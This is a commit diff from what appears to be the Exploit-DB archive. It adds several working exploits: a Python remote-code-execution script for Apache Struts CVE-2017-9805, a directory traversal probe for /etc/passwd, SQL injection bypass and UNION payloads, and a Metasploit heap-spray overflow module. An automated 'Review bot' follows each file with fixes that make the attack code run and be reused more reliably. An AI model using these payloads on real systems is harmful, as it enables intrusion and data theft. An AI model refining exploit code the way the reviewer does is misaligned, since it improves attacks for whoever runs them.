DB: 2017-09-08

4 new exploits

Tor - Linux Sandbox Breakout via X11
Tor (Linux) - X11 Linux Sandbox Breakout
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
Gh0st Client - Buffer Overflow (Metasploit)

TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root
TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution
Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting
Online Invoice System 3.0 - SQL Injection
Offensive Security 2017-09-08 05:01:20 +00:00
parent a1eeba1263
commit 67b3da92e4
5 changed files with 311 additions and 2 deletions


@ -9230,7 +9230,7 @@ id,file,description,date,author,platform,type,port
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0
42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15795,6 +15795,8 @@ id,file,description,date,author,platform,type,port
42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38202,7 +38204,7 @@ id,file,description,date,author,platform,type,port
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root",2017-05-30,"Simone Margaritelli",php,webapps,8181
42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution",2017-05-30,"Simone Margaritelli",php,webapps,8181
42094,platforms/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",php,webapps,0
42095,platforms/php/webapps/42095.txt,"OV3 Online Administration 3.0 - Directory Traversal",2017-05-31,LiquidWorm,php,webapps,0
42096,platforms/php/webapps/42096.txt,"OV3 Online Administration 3.0 - Remote Code Execution",2017-05-31,LiquidWorm,php,webapps,0
@ -38408,3 +38410,5 @@ id,file,description,date,author,platform,type,port
42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0
42628,platforms/php/webapps/42628.txt,"Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps,0
42629,platforms/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0


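--- a/platforms/linux/remote/42627.py
+++ b/platforms/linux/remote/42627.py
@@ -0,0 +1,97 @@
+# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
+# Google Dork: filetype:action
+# Date: 06/09/2017
+# Exploit Author: Warflop
+# Vendor Homepage: https://struts.apache.org/
+# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
+# Version: Struts 2.5 Struts 2.5.12
+# Tested on: Struts 2.5.10
+# CVE : 2017-9805
+#!/usr/bin/env python3
+# coding=utf-8
+# *****************************************************
+# Struts CVE-2017-9805 Exploit
+# Warflop (http://securityattack.com.br/)
+# Greetz: Pimps & G4mbl3r
+# *****************************************************
+import requests
+import sys
+def exploration(command):
+exploit = '''
+<map>
+<entry>
+<jdk.nashorn.internal.objects.NativeString>
+<flags>0</flags>
+<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+<dataHandler>
+<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+<is class="javax.crypto.CipherInputStream">
+<cipher class="javax.crypto.NullCipher">
+<initialized>false</initialized>
+<opmode>0</opmode>
+<serviceIterator class="javax.imageio.spi.FilterIterator">
+<iter class="javax.imageio.spi.FilterIterator">
+<iter class="java.util.Collections$EmptyIterator"/>
+<next class="java.lang.ProcessBuilder">
+<command>
+<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
+</command>
+<redirectErrorStream>false</redirectErrorStream>
+</next>
+</iter>
+<filter class="javax.imageio.ImageIO$ContainsFilter">
+<method>
+<class>java.lang.ProcessBuilder</class>
+<name>start</name>
+<parameter-types/>
+</method>
+<name>foo</name>
+</filter>
+<next class="string">foo</next>
+</serviceIterator>
+<lock/>
+</cipher>
+<input class="java.lang.ProcessBuilder$NullInputStream"/>
+<ibuffer/>
+<done>false</done>
+<ostart>0</ostart>
+<ofinish>0</ofinish>
+<closed>false</closed>
+</is>
+<consumed>false</consumed>
+</dataSource>
+<transferFlavors/>
+</dataHandler>
+<dataLen>0</dataLen>
+</value>
+</jdk.nashorn.internal.objects.NativeString>
+<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+</entry>
+<entry>
+<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+</entry>
+</map>
+'''
+url = sys.argv[1]
+headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
+'Content-Type': 'application/xml'}
+request = requests.post(url, data=exploit, headers=headers)
+print request.text
+if len(sys.argv) < 3:
+print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
+print ('[*] Warflop - http://securityattack.com.br')
+print ('[*] Greatz: Pimps & G4mbl3r')
+print ('[*] Use: python struts2.py URL COMMAND')
+print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
+exit(0)
+else:
+exploration(sys.argv[2])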
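Review bot: `print request.text` at the end of `exploration()` is Python 2 statement syntax, so under the `#!/usr/bin/env python3` line the file does not even parse — and that shebang sits on line 10 below the header comments, where the kernel ignores it, so the interpreter is really whatever `python` resolves to; change the call to `print(request.text)` and move the shebang to line 1. COMMAND is spliced unescaped into the `<string>` element of the XML payload, so a command containing `<`, `&` or `'''` produces a malformed document that the server will reject; pass it through `xml.sax.saxutils.escape(command)` before interpolation. The gadget chain ends in `ProcessBuilder.start` with nothing capturing the process output, so the printed response body is unlikely to contain the command's result (execution appears to be blind); stating that in the usage text would stop users from reading a deserialization error as failure. `requests.post` is also called without `timeout=`, so a target that accepts the connection and never answers hangs the script indefinitely.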

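--- a/platforms/php/webapps/42628.txt
+++ b/platforms/php/webapps/42628.txt
@@ -0,0 +1,44 @@
+# Exploit Title: HRM - Workable Zone : Ultimate HR System <= 1.2 - Unauthenticated Directory Traversal / Stored XSS
+# Date: 2017-09-05
+# Exploit Author: 8bitsec
+# Vendor Homepage: http://workablezone.com
+# Software Link: https://codecanyon.net/item/hrm-workable-zone-ultimate-hr-system/20182372
+# Version: 1.2
+# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
+# Email: contact@8bitsec.io
+# Contact: https://twitter.com/_8bitsec
+Release Date:
+=============
+2017-09-05
+Product & Service Introduction:
+===============================
+Workable Zone is probably one of most customizable Human resourse(HR) management software for companies of all sizes.
+Technical Details & Description:
+================================
+Multiple Stored XSS vulnerabilities found.
+Directory Traversal vulnerability can disclose sensitive files.
+Proof of Concept (PoC):
+=======================
+Stored XSS:
+Logged as Employee:
+Write your payload on:
+Profile > Last Name
+Other vulnerable fields include: First Name, Contact Number
+Unauthenticated Directory Traversal:
+http://localhost.com/download?type=document&filename=../../../../../etc/passwd
+Credits & Authors:
+==================
+8bitsec - [https://twitter.com/_8bitsec]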
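Review bot: The traversal PoC on the `download` endpoint uses `http://localhost.com/...` as its host, and `localhost.com` is a registered public domain rather than the loopback name, so anyone pasting the request as written sends the `../../../../../etc/passwd` probe to a third party — use `localhost` or `example.com`. The stored XSS section names the injectable fields (Last Name, First Name, Contact Number) but gives no payload and does not say which page renders them unescaped or who views it, so the finding cannot be reproduced from the text alone; a line such as `Payload: <script>alert(document.domain)</script> — rendered unescaped on the employee listing` would close that gap. The title calls the traversal "Unauthenticated" but nothing in the PoC shows the request being made without a session, so that claim should be stated explicitly or dropped. The advisory also carries no remediation or vendor-response section.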

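--- a/platforms/php/webapps/42629.txt
+++ b/platforms/php/webapps/42629.txt
@@ -0,0 +1,37 @@
+# # # # #
+# Exploit Title: Online Invoice System 3.0 - SQL Injection
+# Dork: N/A
+# Date: 07.09.2017
+# Vendor Homepage: http://www.onlineinvoicesystem.com/
+# Software Link: http://www.onlineinvoicesystem.com/index_v3.html
+# Demo: http://www.onlineinvoicesystem.com/onlineinvoicesystem3/index.php
+# Version: 3.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# Bypass
+# http://localhost/[PATH]/index.php
+# User: 'or 1=1 or ''=' Pass: anything
+# User: anything Pass: 'or 1=1 or ''='
+#
+# Sql
+# http://localhost/[PATH]/editclient.php?cid=[SQL]
+# -5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+-
+#
+# http://localhost/[PATH]/admin_invoice_print.php?id=[SQL]
+#
+# http://localhost/[PATH]/edit_invoice.php?id=[SQL]
+#
+# http://localhost/[PATH]/admin_invoice.php?id=[SQL]
+# Etc...
+# # # # #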
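Review bot: The authentication-bypass PoC gives only the injected values (`'or 1=1 or ''='`) and not the form field names or HTTP method on `index.php`, so a reader has to guess where the input lands; name the parameters the way the later entries name `cid` and `id`. The UNION payload on `editclient.php?cid=` is written for exactly 26 columns and relies on MySQL-only syntax (`/*!50000 ... */` version comments, `information_schema`, `export_set`), none of which the text states — a one-line note such as `# Backend: MySQL; the editclient query selects 26 columns` would make the payload reusable rather than copy-and-hope. `admin_invoice_print.php`, `edit_invoice.php` and `admin_invoice.php` are listed with `id=[SQL]` but no working payload, and the `admin_` paths suggest an authenticated context that is not stated. There is no remediation or vendor-contact line, and the description sentence ("inject sql commands....") says nothing the title does not.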

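--- a/platforms/windows/remote/42630.rb
+++ b/platforms/windows/remote/42630.rb
@@ -0,0 +1,127 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'zlib'
+class MetasploitModule < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::Tcp
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Gh0st Client buffer Overflow',
+'Description' => %q{
+This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
+},
+'Author' => 'Professor Plum',
+'License' => MSF_LICENSE,
+'References' =>
+[
+],
+'DefaultOptions' =>
+{
+'EXITFUNC' => 'thread',
+'AllowWin32SEH' => true
+},
+'Payload' =>
+{
+'Space' => 1000,
+'BadChars' => '',
+'EncoderType' => Msf::Encoder::Type::AlphanumMixed
+},
+'Platform' => 'win',
+'DisclosureDate' => 'Jul 27 2017',
+'Targets' =>
+[
+['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
+],
+'Privileged' => false,
+'DefaultTarget' => 0))
+register_options(
+[
+OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
+Opt::RPORT(80)
+]
+)
+end
+def make_packet(id, data)
+msg = id.chr + data
+compressed = Zlib::Deflate.deflate(msg)
+datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
+end
+def validate_response(data)
+if data.nil?
+print_status('Server closed connection')
+return false
+end
+if data.empty?
+print_status('No response recieved')
+return false
+end
+if data.size < 13
+print_status('Invalid packet')
+print_status(data)
+return false
+end
+mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
+if mag.index(datastore['MAGIC']) != 0
+print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
+return false
+end
+if pktlen != data.size
+print_status('Packet size mismatch')
+return false
+end
+msg = Zlib::Inflate.inflate(data[13..data.size])
+if msg.size != msglen
+print_status('Packet decompress failure')
+return false
+end
+return true
+end
+def check
+connect
+sock.put(make_packet(101, "\x00")) # heartbeat
+if validate_response(sock.get_once || '')
+return Exploit::CheckCode::Appears
+end
+Exploit::CheckCode::Safe
+end
+def exploit
+print_status("Trying target #{target.name}")
+print_status('Spraying heap...')
+for i in 0..100
+connect
+sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
+if not validate_response(sock.get_once)
+disconnect
+return
+end
+end
+for i in 103..107
+print_status("Trying command #{i}...")
+begin
+connect
+sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
+sock.put(sploit)
+if validate_response(sock.get_once)
+next
+end
+sleep(0.1)
+break
+rescue EOFError
+print_status('Invalid')
+end
+end
+handler
+disconnect
+end
+end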
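Review bot: `validate_response` inflates whatever the peer sends (`Zlib::Inflate.inflate(data[13..data.size])`) without rescuing `Zlib::Error`, so a truncated or deliberately corrupt reply from the Gh0st controller — which in this module is the hostile host — raises out of `check` and `exploit` instead of returning false, and nothing bounds the inflated size before the `msg.size != msglen` comparison, so the declared length cannot protect against an oversized stream. The header size `13` is hard-coded in `make_packet` and in the `data[13..]` slice while MAGIC is a free-form string option, so any MAGIC other than five characters silently corrupts `pktlen` and the slice offset; validating `datastore['MAGIC'].size == 5` once (or deriving the offset from it) keeps the two in step. `'References'` is an empty array for a module with a disclosure date, and the two `for i in` loops are non-idiomatic Ruby (`101.times` / `(103..107).each`); the spray loop also calls `connect` 101 times without `disconnect`, which may be intentional to keep the sprayed buffers alive but deserves a comment saying so.
```ruby
# … unchanged: magic and packet-length checks …
begin
  msg = Zlib::Inflate.inflate(data[13..data.size])
rescue Zlib::Error => e
  print_status("Packet decompress failure: #{e.message}")
  return false
end
if msg.size != msglen
# … unchanged: length mismatch handling and return true …
```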